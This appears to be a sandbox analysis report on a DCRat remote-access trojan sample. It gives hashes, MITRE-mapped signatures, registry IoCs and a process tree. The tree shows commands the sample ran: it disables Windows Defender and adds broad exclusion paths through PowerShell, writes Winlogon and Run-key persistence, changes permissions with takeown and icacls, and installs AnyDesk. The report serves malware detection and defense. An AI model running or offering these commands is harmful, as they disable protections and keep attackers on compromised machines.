dcrat | b82f23ee8617e7ad47d7513fe175e7211564eed5442002927a415d7a035da5cf

Resubmissions

26-12-2022 00:04

221226-acrmcafe2y 10

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:03

26-12-2022 00:02

26-12-2022 00:01

Analysis

max time kernel
144s
max time network
71s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
26-12-2022 00:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

15.7MB
MD5

b27e540aef37c99f3cfd2766c2e61784
SHA1

c516b74daec17d1bc788c54433cf10899ee07e92
SHA256

28ebd60f492ca0957ac7ab3fdbcd8262966dee60dbec71d6bcac8d7efaf65479
SHA512

641d5daaef91d535f279ce7fea1f7c8b50ba87040480602e51951dfc2f3345699d3161d38b1b2ab7b3d4fbbcc56e0d597f125ed65ea3971df4888cb4a63897cd
SSDEEP

393216:XhBqJ0CE8/eXkkM7cGGBNpuXU8ysXVqNIyc2KBcr27eEHTPX:RBe0CiMihuXU8yYqNIygdrX

Score

10^/10

dcrat discovery evasion exploit infostealer persistence rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies WinLogon for persistence 2 TTPs 4 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\cmd.exe\", \"C:\\MSOCache\\All Users\\cmd.exe\", \"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskhost.exe\", \"C:\\Windows\\twain_32\\lsass.exe\""	ComdriverSvc.exe

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

1.exe1.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "3"	1.exe

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1416	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	564	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1488	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	936	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1700	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	272	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	324	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1840	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	560	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1652	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2068	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2092	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2432	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2520	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2544	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2568	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2592	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2760	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2784	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2808	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2828	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2852	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2872	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2888	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2920	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2952	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3016	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3040	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3056	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2088	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2100	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	876	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	680	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1488	1120	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2120	1120	schtasks.exe

DCRat payload 13 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
\ProgramData\dc.exe	dcrat
C:\ProgramData\dc.exe	dcrat
C:\programdata\dc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
C:\runtimeMonitor\ComdriverSvc.exe	dcrat
\runtimeMonitor\ComdriverSvc.exe	dcrat
\runtimeMonitor\ComdriverSvc.exe	dcrat
behavioral14/memory/540-129-0x00000000000F0000-0x00000000001FC000-memory.dmp	dcrat
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe	dcrat
behavioral14/memory/2524-248-0x0000000001210000-0x000000000131C000-memory.dmp	dcrat
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\dwm.exe	dcrat

Executes dropped EXE 7 IoCs

Processes:

1.exeany.exedc.exe1.exewsappz.exeComdriverSvc.exeAnyDesk.exe

pid process

1584 1.exe
1948 any.exe
1156 dc.exe
1956 1.exe
1828 wsappz.exe
540 ComdriverSvc.exe
1636 AnyDesk.exe
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

2564 icacls.exe
924 icacls.exe
1660 icacls.exe
2200 icacls.exe
2532 icacls.exe
2488 takeown.exe
1828 icacls.exe
2092 icacls.exe

pid	process
1584	1.exe
1948	any.exe
1156	dc.exe
1956	1.exe
1828	wsappz.exe
540	ComdriverSvc.exe
1636	AnyDesk.exe

pid	process
2564	icacls.exe
924	icacls.exe
1660	icacls.exe
2200	icacls.exe
2532	icacls.exe
2488	takeown.exe
1828	icacls.exe
2092	icacls.exe

Loads dropped DLL 14 IoCs

Processes:

tmp.execmd.execmd.exewsappz.exe

pid	process
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
1720	tmp.exe
840	cmd.exe
1628	cmd.exe
1628	cmd.exe
1828	wsappz.exe

Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

1828 icacls.exe
2092 icacls.exe
2564 icacls.exe
924 icacls.exe
1660 icacls.exe
2200 icacls.exe
2532 icacls.exe
2488 takeown.exe

pid	process
1828	icacls.exe
2092	icacls.exe
2564	icacls.exe
924	icacls.exe
1660	icacls.exe
2200	icacls.exe
2532	icacls.exe
2488	takeown.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

1.exe1.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware = "1"	1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection	1.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	1.exe

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ComdriverSvc.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\taskhost.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\twain_32\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\twain_32\\lsass.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\cmd.exe\""	ComdriverSvc.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\MSOCache\\All Users\\cmd.exe\""	ComdriverSvc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 2 IoCs

Processes:

1.exe1.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1.exe

Drops file in Program Files directory 2 IoCs

Processes:

ComdriverSvc.exe

description	ioc	process
File created	C:\Program Files\Reference Assemblies\Microsoft\taskhost.exe	ComdriverSvc.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\b75386f1303e64	ComdriverSvc.exe

Drops file in Windows directory 2 IoCs

Processes:

ComdriverSvc.exe

description ioc process

File created C:\Windows\twain_32\lsass.exe ComdriverSvc.exe
File created C:\Windows\twain_32\6203df4a6bafc7 ComdriverSvc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\twain_32\lsass.exe	ComdriverSvc.exe
File created	C:\Windows\twain_32\6203df4a6bafc7	ComdriverSvc.exe

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

pid	process
1840	schtasks.exe
2544	schtasks.exe
2624	schtasks.exe
2808	schtasks.exe
1776	schtasks.exe
564	schtasks.exe
936	schtasks.exe
1700	schtasks.exe
2068	schtasks.exe
2568	schtasks.exe
2952	schtasks.exe
3016	schtasks.exe
1884	schtasks.exe
876	schtasks.exe
2100	schtasks.exe
1652	schtasks.exe
2332	schtasks.exe
2736	schtasks.exe
3040	schtasks.exe
680	schtasks.exe
1488	schtasks.exe
324	schtasks.exe
2092	schtasks.exe
2348	schtasks.exe
2432	schtasks.exe
1488	schtasks.exe
1416	schtasks.exe
2684	schtasks.exe
2872	schtasks.exe
2888	schtasks.exe
2024	schtasks.exe
2472	schtasks.exe
2592	schtasks.exe
2088	schtasks.exe
2120	schtasks.exe
560	schtasks.exe
2276	schtasks.exe
2784	schtasks.exe
2852	schtasks.exe
2976	schtasks.exe
272	schtasks.exe
2708	schtasks.exe
2760	schtasks.exe
2828	schtasks.exe
2920	schtasks.exe
2996	schtasks.exe
3056	schtasks.exe
2520	schtasks.exe

Delays execution with timeout.exe 11 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
2396	timeout.exe
2564	timeout.exe
1972	timeout.exe
2512	timeout.exe
2280	timeout.exe
3032	timeout.exe
2872	timeout.exe
2440	timeout.exe
2720	timeout.exe
960	timeout.exe
2988	timeout.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

2368 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1368 taskkill.exe
876 taskkill.exe

pid	process
2368	tasklist.exe

pid	process
1368	taskkill.exe
876	taskkill.exe

Modifies registry class 16 IoCs

Processes:

wsappz.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" \"%1\""	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\",0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol"	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open	wsappz.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell	wsappz.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk\\AnyDesk.exe\" --play \"%1\""	wsappz.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exe1.exepowershell.exewsappz.exeAnyDesk.exeComdriverSvc.exe

pid	process
964	powershell.exe
472	powershell.exe
1584	1.exe
1584	1.exe
1584	1.exe
1584	1.exe
904	powershell.exe
1828	wsappz.exe
1828	wsappz.exe
1636	AnyDesk.exe
540	ComdriverSvc.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exe1.exetaskkill.exetaskkill.exepowershell.exeComdriverSvc.exe

description	pid	process
Token: SeDebugPrivilege	964	powershell.exe
Token: SeDebugPrivilege	472	powershell.exe
Token: SeDebugPrivilege	1584	1.exe
Token: SeAssignPrimaryTokenPrivilege	1584	1.exe
Token: SeIncreaseQuotaPrivilege	1584	1.exe
Token: 0	1584	1.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	876	taskkill.exe
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	540	ComdriverSvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exeany.execmd.exedc.exenet.exenet.exe

description	pid	process	target process
PID 1720 wrote to memory of 964	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 964	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 964	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 964	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 472	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 472	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 472	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 472	1720	tmp.exe	powershell.exe
PID 1720 wrote to memory of 1584	1720	tmp.exe	1.exe
PID 1720 wrote to memory of 1584	1720	tmp.exe	1.exe
PID 1720 wrote to memory of 1584	1720	tmp.exe	1.exe
PID 1720 wrote to memory of 1584	1720	tmp.exe	1.exe
PID 1720 wrote to memory of 1664	1720	tmp.exe	cmd.exe
PID 1720 wrote to memory of 1664	1720	tmp.exe	cmd.exe
PID 1720 wrote to memory of 1664	1720	tmp.exe	cmd.exe
PID 1720 wrote to memory of 1664	1720	tmp.exe	cmd.exe
PID 1664 wrote to memory of 296	1664	cmd.exe	cmd.exe
PID 1664 wrote to memory of 296	1664	cmd.exe	cmd.exe
PID 1664 wrote to memory of 296	1664	cmd.exe	cmd.exe
PID 1664 wrote to memory of 296	1664	cmd.exe	cmd.exe
PID 1720 wrote to memory of 1948	1720	tmp.exe	any.exe
PID 1720 wrote to memory of 1948	1720	tmp.exe	any.exe
PID 1720 wrote to memory of 1948	1720	tmp.exe	any.exe
PID 1720 wrote to memory of 1948	1720	tmp.exe	any.exe
PID 1720 wrote to memory of 1156	1720	tmp.exe	dc.exe
PID 1720 wrote to memory of 1156	1720	tmp.exe	dc.exe
PID 1720 wrote to memory of 1156	1720	tmp.exe	dc.exe
PID 1720 wrote to memory of 1156	1720	tmp.exe	dc.exe
PID 296 wrote to memory of 636	296	cmd.exe	chcp.com
PID 296 wrote to memory of 636	296	cmd.exe	chcp.com
PID 296 wrote to memory of 636	296	cmd.exe	chcp.com
PID 296 wrote to memory of 636	296	cmd.exe	chcp.com
PID 296 wrote to memory of 1972	296	cmd.exe	timeout.exe
PID 296 wrote to memory of 1972	296	cmd.exe	timeout.exe
PID 296 wrote to memory of 1972	296	cmd.exe	timeout.exe
PID 296 wrote to memory of 1972	296	cmd.exe	timeout.exe
PID 1948 wrote to memory of 112	1948	any.exe	cmd.exe
PID 1948 wrote to memory of 112	1948	any.exe	cmd.exe
PID 1948 wrote to memory of 112	1948	any.exe	cmd.exe
PID 1948 wrote to memory of 112	1948	any.exe	cmd.exe
PID 112 wrote to memory of 1800	112	cmd.exe	chcp.com
PID 112 wrote to memory of 1800	112	cmd.exe	chcp.com
PID 112 wrote to memory of 1800	112	cmd.exe	chcp.com
PID 112 wrote to memory of 1800	112	cmd.exe	chcp.com
PID 1156 wrote to memory of 1884	1156	dc.exe	WScript.exe
PID 1156 wrote to memory of 1884	1156	dc.exe	WScript.exe
PID 1156 wrote to memory of 1884	1156	dc.exe	WScript.exe
PID 1156 wrote to memory of 1884	1156	dc.exe	WScript.exe
PID 112 wrote to memory of 976	112	cmd.exe	net.exe
PID 112 wrote to memory of 976	112	cmd.exe	net.exe
PID 112 wrote to memory of 976	112	cmd.exe	net.exe
PID 112 wrote to memory of 976	112	cmd.exe	net.exe
PID 976 wrote to memory of 1488	976	net.exe	net1.exe
PID 976 wrote to memory of 1488	976	net.exe	net1.exe
PID 976 wrote to memory of 1488	976	net.exe	net1.exe
PID 976 wrote to memory of 1488	976	net.exe	net1.exe
PID 112 wrote to memory of 900	112	cmd.exe	net.exe
PID 112 wrote to memory of 900	112	cmd.exe	net.exe
PID 112 wrote to memory of 900	112	cmd.exe	net.exe
PID 112 wrote to memory of 900	112	cmd.exe	net.exe
PID 900 wrote to memory of 1492	900	net.exe	net1.exe
PID 900 wrote to memory of 1492	900	net.exe	net1.exe
PID 900 wrote to memory of 1492	900	net.exe	net1.exe
PID 900 wrote to memory of 1492	900	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:472

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Drops file in System32 directory
PID:1956

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:296

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:636

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1972

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" dir "C:\ProgramData\Microsoft\Windows Defender" "
4⤵
PID:1256

C:\Windows\SysWOW64\findstr.exe
findstr /i "Platform"
4⤵
PID:560

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
PID:872

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:2368

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:2400

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2488

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2512

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1828

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2092

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2564

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:924

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1660

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2200

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2532

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:2280

\??\c:\programdata\migrate.exe
c:\programdata\migrate.exe -p4432
4⤵
PID:2852

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\tasks\run.bat" "
5⤵
PID:1348

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:960

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 1 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:2396

C:\windows\tasks\Wmiic.exe
"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
6⤵
PID:3068

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 2 /NOBREAK
6⤵
